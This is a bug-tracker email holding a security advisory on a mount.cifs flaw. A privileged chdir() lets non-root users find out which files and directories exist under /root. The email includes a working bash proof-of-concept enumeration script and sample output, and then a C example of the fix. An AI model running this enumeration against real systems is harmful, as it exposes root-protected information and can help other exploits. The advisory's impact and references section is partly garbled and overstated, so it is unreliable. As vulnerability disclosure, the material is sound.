bug#10965: mount.cifs vulnerability
From: Jesus Olmos
Subject: bug#10965: mount.cifs vulnerability
Date: Wed, 07 Mar 2012 19:33:49 +0100
User-agent: Mozilla/5.0 (X11; Linux x86_64; rv:8.0) Gecko/20111108 Thunderbird/8.0
Hello, here is a bug report for mount.cifs: it is a little security breach of
Linux permissions by controlling a privileged chdir().
Regards.
########## Blueliv Advisory 2012-004 ##########
- Discovered by: Jesus Olmos Gonzalez
- Risk: 5/5
- Impact: 1/5
####################################
1. VULNERABILITY
-------------------------
Linux arbitrary privileged chdir();
this leads to arbitrary file identification as root.
2. BACKGROUND
-------------------------
mount.cifs (GNU Software) is part of the Linux base system, and is setuid on
most of the distributions.
This software mounts CIFS partitions to directories authorized by fstab.
3. DESCRIPTION
-------------------------
Although there are no authorized CIFS mounts, it is possible, by way of the
second parameter, to control a privileged chdir() syscall and infer its return
value through the responses.
This implies a little security breach of Linux permissions: a non-root user
can enumerate files and directories as root.
This can help to exploit other vulnerabilities, enumerate /root/ contents,
descriptors used by any process, user homes, etc.
One of the attack vectors is a /root/ directory scan:
address@hidden advs]$ ./root_eye.sh wordlist /root/
--- directories ---
.pulse1
.bash_history
.alsaplayer
.dbus
.mozilla
.VirtualBox
.vim
.links
.config
.cpan
.gnome2
--- files ---
.pulse-cookie
.keystore
.bash_profile
dead.letter
.mysql_history
.Xauthority
.vimrc
.viminfo
secret
It also allows enumerating sub-sub-directories in order to dump readable files.
4. PROOF OF CONCEPT
-------------------------
#!/bin/bash
# root enumerator 0day by address@hidden
# discover root protected files & directories, user homes, process descriptors, ...
path=$2
wordlist=$1
# try each wordlist entry as the mountpoint argument; the privileged chdir()
# inside mount.cifs reports a different error depending on what the path is
for i in `cat $wordlist`
do
echo -n "$i:"
/sbin/mount.cifs //127.0.0.1/a $path/$i
done 2>log.$$ 1>&2
# "denied" in the error means the path is a directory
echo --- directories ---
for i in `grep 'denied' log.$$ | cut -d ':' -f 1`
do
echo $i
done
# "not a directory" means the path exists but is a regular file
echo --- files ---
for i in `grep -i 'not a directory' log.$$ | cut -d ':' -f 1`
do
echo $i
done
rm log.$$
5. BUSINESS IMPACT
-------------------------
Confidentiality can be breached.
This method of transferring files is highly dangerous and can rely on
remote control of the server.
6. SYSTEMS AFFECTED
-------------------------
All versions are affected.
7. SOLUTION
-------------------------
The chdir() should be done after the fstab check.
8. REFERENCES
-------------------------
http://gnu.org
9. CREDITS
-------------------------
Jesus Olmos Gonzalez jolmos(at)blueliv(dot)com
BLUELIV
10. DISCLOSURE TIMELINE
-------------------------
February 20, 2012: Vulnerability discovered
March 07, 2012: Reported to the vendor
11. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse of this information.
--
Jesus Olmos
address@hidden
Parc Innovació La Salle
C/Sant Joan de la Salle 42, Planta 3
08022 Barcelona
Telf. + 34 902908712
Fax. + 34 933960900
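The fix proposed in section 7 is an ordering change: a setuid mount helper must decide from fstab whether the caller is allowed to mount at the requested path before it touches that path with root privileges, otherwise the chdir() error becomes an oracle for file existence and type. The following is an added example illustrating that ordering in C; it is not code from mount.cifs or cifs-utils, and the function names (fstab_allows_user_mount, prepare_mountpoint), the EXAMPLE_FSTAB text and the use of /tmp as the authorized mountpoint are constructed for the example so that it runs on any machine. The fstab lookup is pure string work, so a path that is not an authorized user mount is rejected without any syscall being made on it; as a second layer, the chdir() that follows is done with the caller's own effective uid, so its result can only reveal what the caller could already see unprivileged.

```c
/* Hardened mountpoint preparation for a setuid mount helper (added example,
 * not cifs-utils' own code). Order of operations: fstab check first (no
 * filesystem access), then chdir() with the caller's own privileges. */
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

enum mp_result {
    MP_OK = 0,
    MP_NOT_IN_FSTAB = -1,  /* rejected before the path is touched at all */
    MP_CHDIR_FAILED = -2,  /* chdir() failed with the caller's own privileges */
    MP_PRIV_ERROR = -3     /* could not switch effective uid; do not continue */
};

/* Constructed sample fstab; /tmp is used as the user-mountable cifs target
 * only so that the example can chdir() somewhere that exists everywhere. */
static const char EXAMPLE_FSTAB[] =
    "# constructed sample, not a real system's fstab\n"
    "/dev/sda1 / ext4 defaults 0 1\n"
    "//fileserver.example/share /tmp cifs user,credentials=/etc/cifs.cred 0 0\n"
    "//fileserver.example/missing /tmp/example-missing-mountpoint cifs users 0 0\n"
    "//fileserver.example/other /mnt/other cifs nouser 0 0\n";

/* 1 if the comma-separated option list contains "user" or "users" as a whole
 * token, so that "nouser" or "username=..." never match. */
static int has_user_option(const char *opts)
{
    char buf[256];
    strncpy(buf, opts, sizeof buf - 1);
    buf[sizeof buf - 1] = '\0';
    for (char *tok = strtok(buf, ","); tok; tok = strtok(NULL, ","))
        if (strcmp(tok, "user") == 0 || strcmp(tok, "users") == 0)
            return 1;
    return 0;
}

/* Scan fstab-formatted text for a cifs entry whose mountpoint equals
 * `mountpoint` and carries the user/users option. No filesystem access. */
int fstab_allows_user_mount(const char *fstab_text, const char *mountpoint)
{
    const char *p = fstab_text;
    while (*p) {
        char line[512], spec[256], file[256], type[64], opts[256];
        const char *nl = strchr(p, '\n');
        size_t len = nl ? (size_t)(nl - p) : strlen(p);
        if (len >= sizeof line)
            len = sizeof line - 1;
        memcpy(line, p, len);
        line[len] = '\0';
        p += len + (nl ? 1 : 0);

        if (line[0] == '#' ||
            sscanf(line, "%255s %255s %63s %255s", spec, file, type, opts) != 4)
            continue;
        if (strcmp(type, "cifs") == 0 && strcmp(file, mountpoint) == 0 &&
            has_user_option(opts))
            return 1;
    }
    return 0;
}

/* Authorize first, then enter the mountpoint as the real (calling) user. */
int prepare_mountpoint(const char *fstab_text, const char *mountpoint)
{
    if (!fstab_allows_user_mount(fstab_text, mountpoint))
        return MP_NOT_IN_FSTAB;          /* path never reaches a syscall */

    uid_t saved = geteuid();
    if (seteuid(getuid()) != 0)          /* drop root before touching the path */
        return MP_PRIV_ERROR;
    int rc = chdir(mountpoint);
    int err = errno;
    if (seteuid(saved) != 0)             /* regain root only for the mount(2) step */
        return MP_PRIV_ERROR;
    if (rc != 0) {
        errno = err;
        return MP_CHDIR_FAILED;          /* same answer the user would get from cd */
    }
    return MP_OK;
}

int main(int argc, char **argv)
{
    const char *target = argc > 1 ? argv[1] : "/tmp";
    int rc = prepare_mountpoint(EXAMPLE_FSTAB, target);
    if (rc == MP_NOT_IN_FSTAB)
        printf("%s: not a user mount in fstab, refused before touching it\n", target);
    else if (rc == MP_CHDIR_FAILED)
        printf("%s: chdir failed as the calling user: %s\n", target, strerror(errno));
    else if (rc == MP_PRIV_ERROR)
        printf("privilege switch failed\n");
    else
        printf("%s: authorized and entered, ready to mount\n", target);
    return rc == MP_OK ? 0 : 1;
}
```

Run with a path as the only argument; any path absent from the constructed fstab is refused with MP_NOT_IN_FSTAB before chdir() is called, which is the property the advisory asks for.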